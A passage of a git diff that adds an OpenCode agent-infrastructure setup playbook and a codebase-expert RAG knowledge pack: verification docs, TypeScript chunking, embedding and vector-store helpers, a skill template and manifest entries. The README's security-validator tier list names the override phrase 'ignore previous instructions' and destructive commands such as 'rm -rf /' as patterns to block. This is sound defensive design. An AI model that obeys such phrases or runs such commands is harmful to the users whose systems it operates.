indexing completed and vector store has data | +| Skill not found | Check skill name is lowercase with hyphens | + +## Next Phase + +Proceed to **5_VERIFY.md** to verify installation. diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md new file mode 100644 index 0000000..2c69b01 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/5_VERIFY.md @@ -0,0 +1,117 @@ +# Phase 5: Verify Installation + +## Objective + +Verify the codebase-expert knowledge pack is correctly installed. + +## Verification Checklist + +### 1. Files Present + +- [ ] `.opencode/skill/codebase-expert/SKILL.md` exists +- [ ] `.opencode/memory/knowledge/codebase/` exists +- [ ] `.opencode/memory/knowledge/codebase/index.json` exists +- [ ] `.opencode/plugin/lib/` contains utility files + +### 2. Skill Configuration + +- [ ] SKILL.md has valid YAML frontmatter +- [ ] Name is lowercase (`codebase-expert`) +- [ ] Description contains `USE WHEN` trigger +- [ ] Description under 1024 characters + +### 3. Index Quality + +- [ ] Files were indexed +- [ ] Chunk count is reasonable +- [ ] Languages detected correctly + +### 4. Registry Entry + +- [ ] Pack is registered in knowledge-packs.yaml +- [ ] Sources path is correct +- [ ] Skill path is correct + +## Functional Testing + +### Test 1: Skill Discovery + +In OpenCode, ask: "What skills are available?" + +**Expected**: codebase-expert should appear in the list. + +### Test 2: Code Search + +Ask: "Where is the main entry point?" + +**Expected**: Agent finds and references the main entry file. + +### Test 3: Architecture + +Ask: "How is the project structured?" + +**Expected**: Agent describes directory structure and organization. + +### Test 4: Functionality + +Ask: "How does [specific feature] work?" + +**Expected**: Agent retrieves and explains relevant code. + +## Validation Commands + +### Check Skill Name + +```bash +# Should be lowercase with hyphens +ls -la .opencode/skill/ +``` + +### Verify SKILL.md Format + +```bash +# Check frontmatter +head -20 .opencode/skill/codebase-expert/SKILL.md +``` + +### Check Index + +```bash +cat .opencode/memory/knowledge/codebase/index.json +``` + +## Success Criteria + +- All files present +- Skill name follows OpenCode convention (lowercase-with-hyphens) +- Index populated +- Semantic search working +- Skill discoverable by OpenCode + +## Troubleshooting + +### Skill Not Found + +- Verify skill name is lowercase with hyphens +- Check SKILL.md has valid frontmatter +- Ensure `.opencode/skill/codebase-expert/SKILL.md` exists + +### No Search Results + +- Verify files were indexed +- Check embedding generation is configured +- Confirm vector store populated + +### Wrong Results + +- Review chunking strategy +- Check file exclusions +- Verify language detection + +## Installation Complete + +The codebase-expert knowledge pack is now installed. + +--- + +*codebase-expert Knowledge Pack v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md new file mode 100644 index 0000000..f39cd3b --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/README.md @@ -0,0 +1,70 @@ +# codebase-expert Knowledge Pack + +Installs the codebase-expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase. + +## What This Pack Does + +The codebase-expert pack gives your agent deep understanding of your codebase: + +- **Semantic Code Search** - Find relevant code by meaning, not just keywords +- **Architecture Understanding** - Understand how components connect +- **Pattern Recognition** - Identify common patterns and conventions +- **Context-Aware Assistance** - Get help that understands your specific codebase + +## Prerequisites + +- OpenCode Cognitive Infrastructure must be installed first +- A codebase to analyze (the agent's working directory) + +## Installation + +Run this playbook after OpenCode Cognitive Infrastructure is set up. The playbook will: + +1. Analyze the codebase structure +2. Index code files for semantic search +3. Install the codebase-expert skill +4. Configure RAG retrieval plugin (optional) + +## After Installation + +The agent will automatically: +- Retrieve relevant code context when answering questions +- Understand the codebase architecture +- Reference specific files and functions in responses + +## Skill Triggers + +The codebase-expert skill activates on queries about: +- Code structure and architecture +- Finding specific functionality +- Understanding how components work +- Debugging and troubleshooting + +## Assets + +This playbook includes the following assets in the `assets/` folder: + +| Asset | Purpose | +|-------|---------| +| `lib/embeddings.ts` | Text embedding generation (placeholder - configure provider) | +| `lib/vector-store.ts` | Vector storage for semantic search | +| `lib/chunking.ts` | Document chunking strategies | +| `lib/registry.ts` | Knowledge pack registration | +| `templates/skills/codebase-expert/SKILL.md` | Skill definition template | + +Reference assets using `{{AUTORUN_FOLDER}}/assets/` in playbook documents. + +### Configuration Required + +The `embeddings.ts` file contains a **placeholder implementation**. You must configure an actual embedding provider (OpenAI, Ollama, etc.) for semantic search to work. See the file comments for configuration examples. + +## OpenCode-Specific Notes + +This pack follows OpenCode conventions: +- Skill name uses lowercase-with-hyphens (`codebase-expert`) +- Files install to `.opencode/skill/` and `.opencode/memory/` +- Plugins use TypeScript with `@opencode-ai/plugin` types + +--- + +*codebase-expert Knowledge Pack v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts new file mode 100644 index 0000000..5446af2 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/chunking.ts @@ -0,0 +1,199 @@ +/** + * Document Chunking + * + * Strategies for splitting documents into chunks for embedding. + */ + +interface Chunk { + content: string; + index: number; + metadata?: { + startLine?: number; + endLine?: number; + source?: string; + }; +} + +interface ChunkingOptions { + maxChunkSize?: number; + overlap?: number; + preserveParagraphs?: boolean; +} + +const defaultOptions: ChunkingOptions = { + maxChunkSize: 1000, + overlap: 100, + preserveParagraphs: true, +}; + +/** + * Split text into chunks by character count + */ +export function chunkBySize( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize, overlap } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + let start = 0; + let index = 0; + + while (start < text.length) { + const end = Math.min(start + maxChunkSize!, text.length); + + chunks.push({ + content: text.slice(start, end), + index, + }); + + start = end - overlap!; + index++; + } + + return chunks; +} + +/** + * Split text into chunks by paragraph + */ +export function chunkByParagraph( + text: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const paragraphs = text.split(/\n\n+/); + const chunks: Chunk[] = []; + + let currentChunk = ''; + let index = 0; + + for (const paragraph of paragraphs) { + if (currentChunk.length + paragraph.length > maxChunkSize!) { + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + index++; + } + currentChunk = paragraph; + } else { + currentChunk += (currentChunk ? '\n\n' : '') + paragraph; + } + } + + if (currentChunk) { + chunks.push({ + content: currentChunk.trim(), + index, + }); + } + + return chunks; +} + +/** + * Split code into chunks by function/class + */ +export function chunkByCodeBlock( + code: string, + options: ChunkingOptions = {} +): Chunk[] { + const { maxChunkSize } = { ...defaultOptions, ...options }; + const chunks: Chunk[] = []; + + // Simple regex-based splitting for common patterns + const patterns = [ + /^(export\s+)?(async\s+)?function\s+\w+/gm, + /^(export\s+)?class\s+\w+/gm, + /^(export\s+)?const\s+\w+\s*=/gm, + ]; + + const lines = code.split('\n'); + let currentChunk: string[] = []; + let startLine = 0; + let index = 0; + + for (let i = 0; i < lines.length; i++) { + const line = lines[i]; + const isBlockStart = patterns.some(p => p.test(line)); + + if (isBlockStart && currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: i - 1 }, + }); + index++; + } + currentChunk = []; + startLine = i; + } + + currentChunk.push(line); + + // Force split if chunk is too large + if (currentChunk.join('\n').length > maxChunkSize!) { + chunks.push({ + content: currentChunk.join('\n'), + index, + metadata: { startLine, endLine: i }, + }); + index++; + currentChunk = []; + startLine = i + 1; + } + } + + if (currentChunk.length > 0) { + const content = currentChunk.join('\n'); + if (content.trim()) { + chunks.push({ + content, + index, + metadata: { startLine, endLine: lines.length - 1 }, + }); + } + } + + return chunks; +} + +/** + * Smart chunking that detects content type + */ +export function smartChunk( + content: string, + options: ChunkingOptions = {} +): Chunk[] { + // Detect if content looks like code + const codeIndicators = [ + /^import\s+/m, + /^export\s+/m, + /function\s+\w+\s*\(/, + /class\s+\w+/, + /const\s+\w+\s*=/, + ]; + + const isCode = codeIndicators.some(p => p.test(content)); + + if (isCode) { + return chunkByCodeBlock(content, options); + } + + if (options.preserveParagraphs) { + return chunkByParagraph(content, options); + } + + return chunkBySize(content, options); +} + +export default { + chunkBySize, + chunkByParagraph, + chunkByCodeBlock, + smartChunk, +}; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts new file mode 100644 index 0000000..4ab74e3 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/embeddings.ts @@ -0,0 +1,118 @@ +/** + * Embeddings Generation + * + * Generates text embeddings for semantic search capabilities. + * + * ⚠️ CONFIGURATION REQUIRED ⚠️ + * + * This file contains a PLACEHOLDER implementation that returns random vectors. + * You MUST replace generateEmbedding() with a real embedding provider: + * + * Option 1: OpenAI (recommended) + * ``` + * import OpenAI from 'openai'; + * const openai = new OpenAI({ apiKey: process.env.OPENAI_API_KEY }); + * + * export async function generateEmbedding(text: string): Promise { + * const response = await openai.embeddings.create({ + * model: 'text-embedding-3-small', + * input: text, + * }); + * return response.data[0].embedding; + * } + * ``` + * + * Option 2: Ollama (local) + * ``` + * export async function generateEmbedding(text: string): Promise { + * const response = await fetch('http://localhost:11434/api/embeddings', { + * method: 'POST', + * body: JSON.stringify({ model: 'nomic-embed-text', prompt: text }), + * }); + * return (await response.json()).embedding; + * } + * ``` + */ + +interface EmbeddingConfig { + model: string; + dimensions: number; + batchSize: number; +} + +const defaultConfig: EmbeddingConfig = { + model: 'text-embedding-3-small', + dimensions: 1536, + batchSize: 100, +}; + +/** + * Generate embedding for a single text + * + * ⚠️ PLACEHOLDER - Returns random vectors! + * Replace this function with a real embedding provider. + */ +export async function generateEmbedding( + text: string, + config: Partial = {} +): Promise { + const finalConfig = { ...defaultConfig, ...config }; + + // ⚠️ PLACEHOLDER IMPLEMENTATION - REPLACE ME! + // This returns random vectors which will NOT provide meaningful semantic search. + // See the file header comments for implementation examples. + console.warn( + '⚠️ embeddings.ts: Using placeholder implementation. ' + + 'Configure a real embedding provider for semantic search to work.' + ); + return new Array(finalConfig.dimensions).fill(0).map(() => Math.random()); +} + +/** + * Generate embeddings for multiple texts + */ +export async function generateEmbeddings( + texts: string[], + config: Partial = {} +): Promise { + const finalConfig = { ...defaultConfig, ...config }; + const results: number[][] = []; + + // Process in batches + for (let i = 0; i < texts.length; i += finalConfig.batchSize) { + const batch = texts.slice(i, i + finalConfig.batchSize); + const batchResults = await Promise.all( + batch.map(text => generateEmbedding(text, config)) + ); + results.push(...batchResults); + } + + return results; +} + +/** + * Calculate cosine similarity between two embeddings + */ +export function cosineSimilarity(a: number[], b: number[]): number { + if (a.length !== b.length) { + throw new Error('Embeddings must have same dimensions'); + } + + let dotProduct = 0; + let normA = 0; + let normB = 0; + + for (let i = 0; i < a.length; i++) { + dotProduct += a[i] * b[i]; + normA += a[i] * a[i]; + normB += b[i] * b[i]; + } + + return dotProduct / (Math.sqrt(normA) * Math.sqrt(normB)); +} + +export default { + generateEmbedding, + generateEmbeddings, + cosineSimilarity, +}; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts new file mode 100644 index 0000000..d7d9570 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/registry.ts @@ -0,0 +1,114 @@ +/** + * Knowledge Pack Registry + * + * Manages registration and discovery of installed knowledge packs. + */ + +interface KnowledgePack { + id: string; + name: string; + version: string; + installed: string; + sources: Array<{ + path: string; + type: 'file' | 'directory' | 'embedded'; + }>; + skillPath?: string; + metadata?: Record; +} + +interface RegistryConfig { + configPath: string; +} + +/** + * Singleton registry for knowledge packs + */ +export class Registry { + private static instance: Registry; + private packs: Map = new Map(); + private configPath: string; + + private constructor(config: RegistryConfig) { + this.configPath = config.configPath; + } + + /** + * Get the singleton instance + */ + static getInstance(config?: RegistryConfig): Registry { + if (!Registry.instance) { + Registry.instance = new Registry(config || { + configPath: '.opencode/config/knowledge-packs.yaml' + }); + } + return Registry.instance; + } + + /** + * Register a new knowledge pack + */ + register(pack: KnowledgePack): void { + this.packs.set(pack.id, pack); + this.persist(); + } + + /** + * Unregister a knowledge pack + */ + unregister(packId: string): boolean { + const result = this.packs.delete(packId); + if (result) { + this.persist(); + } + return result; + } + + /** + * Get a specific pack by ID + */ + getPack(packId: string): KnowledgePack | undefined { + return this.packs.get(packId); + } + + /** + * Get all registered packs + */ + getAllPacks(): KnowledgePack[] { + return Array.from(this.packs.values()); + } + + /** + * Get active (non-disabled) packs + */ + getActivePacks(): KnowledgePack[] { + return this.getAllPacks().filter( + pack => pack.metadata?.disabled !== true + ); + } + + /** + * Check if a pack is installed + */ + isInstalled(packId: string): boolean { + return this.packs.has(packId); + } + + /** + * Load registry from config file + */ + async load(): Promise { + // Implementation would read from YAML config + // Placeholder for actual file system operations + } + + /** + * Persist registry to config file + */ + private persist(): void { + // Implementation would write to YAML config + // Placeholder for actual file system operations + } +} + +export default Registry; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts new file mode 100644 index 0000000..ec6880b --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/lib/vector-store.ts @@ -0,0 +1,143 @@ +/** + * Vector Store + * + * In-memory vector storage for semantic search. + */ + +import { cosineSimilarity } from './embeddings'; + +interface VectorEntry { + id: string; + content: string; + embedding: number[]; + metadata?: Record; +} + +interface SearchResult { + id: string; + content: string; + score: number; + metadata?: Record; +} + +interface SearchOptions { + limit?: number; + minScore?: number; + filter?: (entry: VectorEntry) => boolean; +} + +/** + * Vector store for a single knowledge pack + */ +export class VectorStore { + private static stores: Map = new Map(); + + private packId: string; + private entries: Map = new Map(); + + private constructor(packId: string) { + this.packId = packId; + } + + /** + * Get or create a vector store for a pack + */ + static forPack(packId: string): VectorStore { + if (!VectorStore.stores.has(packId)) { + VectorStore.stores.set(packId, new VectorStore(packId)); + } + return VectorStore.stores.get(packId)!; + } + + /** + * Add an entry to the store + */ + add(entry: VectorEntry): void { + this.entries.set(entry.id, entry); + } + + /** + * Add multiple entries + */ + addAll(entries: VectorEntry[]): void { + for (const entry of entries) { + this.add(entry); + } + } + + /** + * Remove an entry + */ + remove(id: string): boolean { + return this.entries.delete(id); + } + + /** + * Search for similar entries + */ + async search( + queryEmbedding: number[], + options: SearchOptions = {} + ): Promise { + const { + limit = 10, + minScore = 0.0, + filter, + } = options; + + const results: SearchResult[] = []; + + for (const entry of this.entries.values()) { + // Apply filter if provided + if (filter && !filter(entry)) { + continue; + } + + const score = cosineSimilarity(queryEmbedding, entry.embedding); + + if (score >= minScore) { + results.push({ + id: entry.id, + content: entry.content, + score, + metadata: entry.metadata, + }); + } + } + + // Sort by score descending and limit + return results + .sort((a, b) => b.score - a.score) + .slice(0, limit); + } + + /** + * Get store size + */ + size(): number { + return this.entries.size; + } + + /** + * Clear all entries + */ + clear(): void { + this.entries.clear(); + } + + /** + * Persist store to disk + */ + async persist(path: string): Promise { + // Implementation would serialize and write to disk + } + + /** + * Load store from disk + */ + async load(path: string): Promise { + // Implementation would read and deserialize from disk + } +} + +export default VectorStore; diff --git a/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md new file mode 100644 index 0000000..b5b2456 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/Knowledge-Packs/codebase-expert/assets/templates/skills/codebase-expert/SKILL.md @@ -0,0 +1,43 @@ +--- +name: codebase-expert +description: Deep expertise in the current codebase with semantic search and contextual understanding. USE WHEN user asks about code structure, architecture, implementations, or wants to find specific functionality, classes, or functions. +--- + +# codebase-expert + +## Overview + +Deep expertise in the current codebase, providing semantic search and contextual understanding of code structure, patterns, and implementation details. + +## Capabilities + +### Code Search +- Semantic search across all indexed files +- Find functions, classes, and modules by description +- Locate implementations of specific features + +### Architecture Understanding +- Directory structure and organization +- Module relationships and dependencies +- Entry points and exports + +### Pattern Recognition +- Common patterns used in the codebase +- Coding conventions and standards +- Architectural decisions + +## Usage + +This skill automatically activates when you ask about: +- Code structure ("How is the project organized?") +- Implementations ("Where is X implemented?") +- Functionality ("How does Y work?") +- Finding code ("Find the function that does Z") + +## Context Injection + +When active, relevant code snippets are automatically retrieved and provided as context for more accurate responses. + +--- + +*codebase-expert Skill v1.0.0* diff --git a/Setup/OpenCode-Cognitive-Infrastructure/README.md b/Setup/OpenCode-Cognitive-Infrastructure/README.md new file mode 100644 index 0000000..b5a74b8 --- /dev/null +++ b/Setup/OpenCode-Cognitive-Infrastructure/README.md @@ -0,0 +1,228 @@ +# OpenCode Cognitive Infrastructure Setup + +Deploys the complete OpenCode Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven plugins. + +## What This Playbook Does + +This playbook creates the foundational `.opencode/` directory structure that gives OpenCode-based agents their cognitive capabilities: + +- **Plugin System** - Event-driven automation with security validation, session management, and event logging +- **Memory System** - Three-tier persistent knowledge (hot/warm/cold) for session history, learnings, and state +- **Skills Framework** - Modular domain expertise with on-demand loading and USE WHEN activation +- **Configuration** - opencode.json and config files for customization + +## Infrastructure Structure + +After running this playbook, the agent will have: + +``` +Agent Directory/ +├── AGENTS.md # Agent identity (single source of truth) +├── opencode.json # Main configuration +└── .opencode/ + ├── VERSION # Infrastructure version tracking + ├── config/ + │ └── config.yaml # Runtime settings + ├── skill/ + │ ├── core/ + │ │ └── SKILL.md # Core identity skill + │ └── create-skill/ + │ └── SKILL.md # Skill creation skill + ├── plugin/ + │ ├── security-validator.ts # 10-tier attack pattern blocking + │ ├── session-manager.ts # Session lifecycle handling + │ ├── event-logger.ts # Tool execution logging + │ └── context-loader.ts # Context initialization + ├── memory/ + │ ├── README.md # Memory system docs + │ ├── state/ # Operational state + │ ├── signals/ # Pattern detection + │ ├── work/ # Per-task memory + │ ├── learning/ # Phase-based learnings + │ │ ├── observe/ + │ │ ├── think/ + │ │ ├── plan/ + │ │ ├── build/ + │ │ ├── execute/ + │ │ └── verify/ + │ ├── research/ # Research outputs + │ ├── sessions/ # Session summaries + │ ├── learnings/ # Learning moments + │ ├── decisions/ # ADRs + │ ├── execution/ # Task logs + │ ├── security/ # Security events + │ ├── recovery/ # Recovery snapshots + │ ├── raw-outputs/ # JSONL event streams + │ └── backups/ # Pre-change backups + ├── command/ # Custom commands + ├── agents/ # Custom agent definitions + └── docs/ + ├── SKILLSYSTEM.md # Skill system docs + ├── MEMORYSYSTEM.md # Memory system docs + └── PLUGINSYSTEM.md # Plugin system docs +``` + +## Plugin System Features + +The playbook installs a complete plugin system with: + +| Plugin | Event | Purpose | +|--------|-------|---------| +| `security-validator.ts` | tool.execute.before | 10-tier attack pattern blocking | +| `session-manager.ts` | lifecycle | Session state management | +| `event-logger.ts` | tool.execute.after | Log tool executions to memory | +| `context-loader.ts` | startup | Load CORE skill context | + +### Security Validator Tiers + +1. **Catastrophic** - `rm -rf /`, disk destruction (BLOCK) +2. **Reverse Shells** - Bash/netcat/socket shells (BLOCK) +3. **Credential Theft** - curl|sh, wget|sh patterns (BLOCK) +4. **Prompt Injection** - "ignore previous instructions" (BLOCK) +5. **Environment Manipulation** - API key exposure (WARN) +6. **Git Dangerous** - force push, hard reset (WARN) +7. **System Modification** - chmod 777, sudo (LOG) +8. **Network Operations** - ssh, scp, rsync (LOG) +9. **Data Exfiltration** - upload patterns (BLOCK) +10. **Infrastructure Protection** - rm .opencode (BLOCK) + +## Memory System Features + +Three-tier memory architecture: + +| Tier | Temperature | Purpose | Location | +|------|-------------|---------|----------| +| **CAPTURE** | Hot | Active work items | `memory/work/` | +| **SYNTHESIS** | Warm | Phase-based learnings | `memory/learning/` | +| **APPLICATION** | Cold | Historical archive | `memory/sessions/`, etc. | + +## Skills System Features + +- **YAML Frontmatter** with `USE WHEN` activation triggers +- **Lowercase naming** convention with hyphens (e.g., `code-review`) +- **On-demand loading** - metadata at startup, full body on invocation +- **Claude-compatible** - works with `.claude/skills/` locations too +- **create-skill** skill for generating new skills + +## Comparison: Claude Code vs OpenCode + +| Feature | Claude Code | OpenCode | +|---------|-------------|----------| +| Config directory | `.claude/` | `.opencode/` | +| Main config | `.claude/settings.json` | `opencode.json` | +| Identity file | `CLAUDE.md` | `AGENTS.md` | +| Hooks/Plugins | Shell command hooks | TypeScript plugins | +| Skills location | `.claude/skills/` | `.opencode/skill/` | +| Skill naming | TitleCase | lowercase-with-hyphens | +| Memory | `.claude/MEMORY/` | `.opencode/memory/` | + +## Prerequisites + +- An agent directory where you want to install the infrastructure +- The agent should have a clear purpose/role (used to generate identity) +- **Node.js** (v18+) or **Bun** runtime for TypeScript plugins +- **OpenCode CLI** installed - https://opencode.ai + +## Usage + +Run this playbook in the target agent's directory. The playbook will: + +1. Analyze the agent's purpose from directory name and any existing files +2. Generate appropriate agent identity (name, mission, role) +3. Create the complete `.opencode/` directory structure +4. Install the Plugin System with security validator +5. Initialize the Memory System with three-tier architecture +6. Create the Skills Framework with core and create-skill +7. Verify the installation + +## After Installation + +Once the infrastructure is installed, you can: + +1. Configure **MCP servers** for external tool integrations +2. Add **custom skills** for domain expertise +3. Customize the AGENTS.md with additional instructions +4. Add custom **plugins** for automation +5. Create **custom commands** for reusable prompts +6. Start using the agent with full cognitive capabilities + +## Git Configuration + +### What to Commit + +| Directory | Commit? | Reason | +|-----------|---------|--------| +| `opencode.json` | Yes | Main configuration | +| `.opencode/VERSION` | Yes | Infrastructure version | +| `.opencode/config/` | Yes | Runtime settings | +| `.opencode/skill/` | Yes | Skill definitions | +| `.opencode/plugin/` | Yes | Plugin code | +| `.opencode/docs/` | Yes | Documentation | +| `.opencode/memory/state/` | No | Session state | +| `.opencode/memory/signals/` | No | Pattern detection | +| `.opencode/memory/work/` | No | Active work items | +| `.opencode/memory/raw-outputs/` | No | Event logs | +| `.opencode/memory/sessions/` | No | Session history | +| `.opencode/memory/security/` | No | Security events | +| `AGENTS.md` | Yes | Agent identity | + +### Recommended .gitignore + +```gitignore +# OpenCode Cognitive Infrastructure - Private Data +.opencode/memory/raw-outputs/ +.opencode/memory/sessions/ +.opencode/memory/security/ +.opencode/memory/state/ +.opencode/memory/signals/ +.opencode/memory/work/ + +# Keep structure but ignore contents +!.opencode/memory/.gitkeep +!.opencode/memory/state/.gitkeep +``` + +## MCP Server Integration + +OpenCode supports MCP (Model Context Protocol) servers for external tools. Add to `opencode.json`: + +```json +{ + "mcp": { + "context7": { + "type": "remote", + "url": "https://mcp.context7.com", + "enabled": true + } + } +} +``` + +## Version Migration + +### Upgrading Infrastructure + +1. **Check current version**: Read `.opencode/VERSION` +2. **Backup existing**: `cp -r .opencode .opencode.backup` +3. **Run upgrade playbook**: Future versions will include migration scripts +4. **Verify**: Run the 5_VERIFY phase to confirm upgrade success + +### Version History + +| Version | Changes | +|---------|---------| +| 1.0.0 | Initial release with plugin system, memory system, skills framework | + +## Version + +Current infrastructure version: **1.0.0** + +## Credits + +The OpenCode Cognitive Infrastructure is adapted from the Claude Cognitive Infrastructure, which was influenced by [Daniel Miessler's](https://danielmiessler.com/) [Personal AI Infrastructure](https://github.com/danielmiessler/Personal_AI_Infrastructure) project. + +OpenCode documentation and plugin system based on the official [OpenCode documentation](https://opencode.ai/docs/). + +--- + +*OpenCode Cognitive Infrastructure Setup Playbook* diff --git a/manifest.json b/manifest.json index b9af1c1..7751437 100644 --- a/manifest.json +++ b/manifest.json @@ -177,6 +177,52 @@ "loopEnabled": true, "maxLoops": 10, "prompt": null + }, + { + "id": "setup-cognitive-infrastructure", + "title": "Claude Cognitive Infrastructure", + "description": "Deploys the complete Claude Cognitive Infrastructure to any agent directory, enabling persistent memory, modular skills, context management, and event-driven hooks.", + "category": "Setup", + "subcategory": "Claude-Cognitive-Infrastructure", + "author": "Stephan Chenette", + "authorLink": "https://github.com/stephanchenette", + "tags": ["infrastructure", "memory", "skills", "context", "hooks", "agent-setup"], + "lastUpdated": "2026-01-10", + "path": "Setup/Claude-Cognitive-Infrastructure", + "documents": [ + { "filename": "0_INITIALIZE", "resetOnCompletion": false }, + { "filename": "1_ANALYZE", "resetOnCompletion": false }, + { "filename": "2_PLAN_STRUCTURE", "resetOnCompletion": false }, + { "filename": "3_EVALUATE", "resetOnCompletion": false }, + { "filename": "4_IMPLEMENT", "resetOnCompletion": false }, + { "filename": "5_VERIFY", "resetOnCompletion": false } + ], + "loopEnabled": false, + "maxLoops": 1, + "prompt": null + }, + { + "id": "setup-knowledge-pack-codebase-expert", + "title": "Codebase Expert Knowledge Pack", + "description": "Installs the Codebase Expert knowledge pack, enabling RAG-powered code understanding with semantic search across the codebase.", + "category": "Setup", + "subcategory": "Knowledge-Packs", + "author": "Stephan Chenette", + "authorLink": "https://github.com/stephanchenette", + "tags": ["knowledge-pack", "codebase", "rag", "semantic-search", "code-understanding"], + "lastUpdated": "2026-01-10", + "path": "Setup/Knowledge-Packs/Codebase-Expert", + "documents": [ + { "filename": "0_INITIALIZE", "resetOnCompletion": false }, + { "filename": "1_ANALYZE", "resetOnCompletion": false }, + { "filename": "2_PLAN_STRUCTURE", "resetOnCompletion": false }, + { "filename": "3_EVALUATE", "resetOnCompletion": false }, + { "filename": "4_IMPLEMENT", "resetOnCompletion": false }, + { "filename": "5_VERIFY", "resetOnCompletion": false } + ], + "loopEnabled": false, + "maxLoops": 1, + "prompt": null } ] }